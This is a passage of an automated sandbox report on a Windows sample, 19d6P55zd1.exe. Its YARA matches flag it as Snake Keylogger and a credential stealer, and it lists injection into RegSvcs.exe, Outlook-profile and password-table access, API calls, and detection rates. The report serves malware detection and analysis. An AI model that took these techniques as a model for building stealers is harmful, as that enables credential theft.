                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B51FE82_2_05B51FE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5B7E82_2_05B5B7E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5CFD02_2_05B5CFD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B53FD82_2_05B53FD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5E7C82_2_05B5E7C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B517102_2_05B51710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B517012_2_05B51701
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B566B02_2_05B566B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B536B92_2_05B536B9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B556B82_2_05B556B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B566A02_2_05B566A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B556A92_2_05B556A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B57E982_2_05B57E98
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B596802_2_05B59680
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B57E882_2_05B57E88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B536C82_2_05B536C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5DE382_2_05B5DE38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5F6202_2_05B5F620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5DE282_2_05B5DE28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5F6102_2_05B5F610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5966F2_2_05B5966F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5AE682_2_05B5AE68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5C6502_2_05B5C650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5AE582_2_05B5AE58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5C6412_2_05B5C641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B591B82_2_05B591B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B591A72_2_05B591A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5A9A02_2_05B5A9A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5A98F2_2_05B5A98F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5C1882_2_05B5C188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B579D02_2_05B579D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B561D92_2_05B561D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B579C02_2_05B579C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B529182_2_05B52918
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B549082_2_05B54908
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5290A2_2_05B5290A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5D9702_2_05B5D970
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5C1782_2_05B5C178
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B509602_2_05B50960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5D9602_2_05B5D960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B509502_2_05B50950
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5F1472_2_05B5F147
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B548F92_2_05B548F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5702F2_2_05B5702F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B588282_2_05B58828
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5A0102_2_05B5A010
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B588192_2_05B58819
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B500062_2_05B50006
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B500402_2_05B50040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B570402_2_05B57040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B55B372_2_05B55B37
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5B3302_2_05B5B330
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B59B382_2_05B59B38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5CB162_2_05B5CB16
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5B31F2_2_05B5B31F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5CB182_2_05B5CB18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5E3002_2_05B5E300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B56B782_2_05B56B78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B583602_2_05B58360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B51B682_2_05B51B68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B56B6A2_2_05B56B6A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B583502_2_05B58350
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B53B582_2_05B53B58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B51B582_2_05B51B58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B55B482_2_05B55B48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B59B482_2_05B59B48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B53B482_2_05B53B48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B512802_2_05B51280
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5E2EF2_2_05B5E2EF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5FAE82_2_05B5FAE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5FAD72_2_05B5FAD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B532382_2_05B53238
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B532272_2_05B53227
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B552282_2_05B55228
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B552182_2_05B55218
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05B5126F2_2_05B5126F
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: String function: 00340AE3 appears 70 times
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: String function: 00327DE1 appears 35 times
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: String function: 00348900 appears 42 times
                  Source: 19d6P55zd1.exe, 00000000.00000003.2161860434.0000000003A13000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 19d6P55zd1.exe
                  Source: 19d6P55zd1.exe, 00000000.00000003.2162748728.0000000003BBD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 19d6P55zd1.exe
                  Source: 19d6P55zd1.exe, 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 19d6P55zd1.exe
                  Source: 19d6P55zd1.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.19d6P55zd1.exe.1e90000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.19d6P55zd1.exe.1e90000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.19d6P55zd1.exe.1e90000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: Process Memory Space: 19d6P55zd1.exe PID: 4340, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 1340, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@3/3
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0038A06A GetLastError,FormatMessageW,0_2_0038A06A
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003781CB AdjustTokenPrivileges,CloseHandle,0_2_003781CB
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003787E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_003787E1
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0038B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0038B333
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0039EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0039EE0D
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003983BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_003983BB
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00324E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00324E89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeFile created: C:\Users\user\AppData\Local\Temp\autCBDF.tmpJump to behavior
                  Source: 19d6P55zd1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.000000000332B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.000000000333B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.000000000337B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.000000000336F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.0000000003349000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: 19d6P55zd1.exeVirustotal: Detection: 69%
                  Source: 19d6P55zd1.exeReversingLabs: Detection: 76%
                  Source: unknownProcess created: C:\Users\user\Desktop\19d6P55zd1.exe "C:\Users\user\Desktop\19d6P55zd1.exe"
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\19d6P55zd1.exe"
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\19d6P55zd1.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: 19d6P55zd1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: 19d6P55zd1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: 19d6P55zd1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: 19d6P55zd1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: 19d6P55zd1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: 19d6P55zd1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: 19d6P55zd1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP source: 19d6P55zd1.exe, 00000000.00000003.2163750749.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, 19d6P55zd1.exe, 00000000.00000003.2162644338.00000000038F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: 19d6P55zd1.exe, 00000000.00000003.2163750749.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, 19d6P55zd1.exe, 00000000.00000003.2162644338.00000000038F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: 19d6P55zd1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: 19d6P55zd1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: 19d6P55zd1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: 19d6P55zd1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: 19d6P55zd1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00324B37 LoadLibraryA,GetProcAddress,0_2_00324B37
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0032C508 push A30032BAh; retn 0032h0_2_0032C50D
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00348945 push ecx; ret 0_2_00348958
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003248D7
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003A5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_003A5376
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00343187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00343187
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
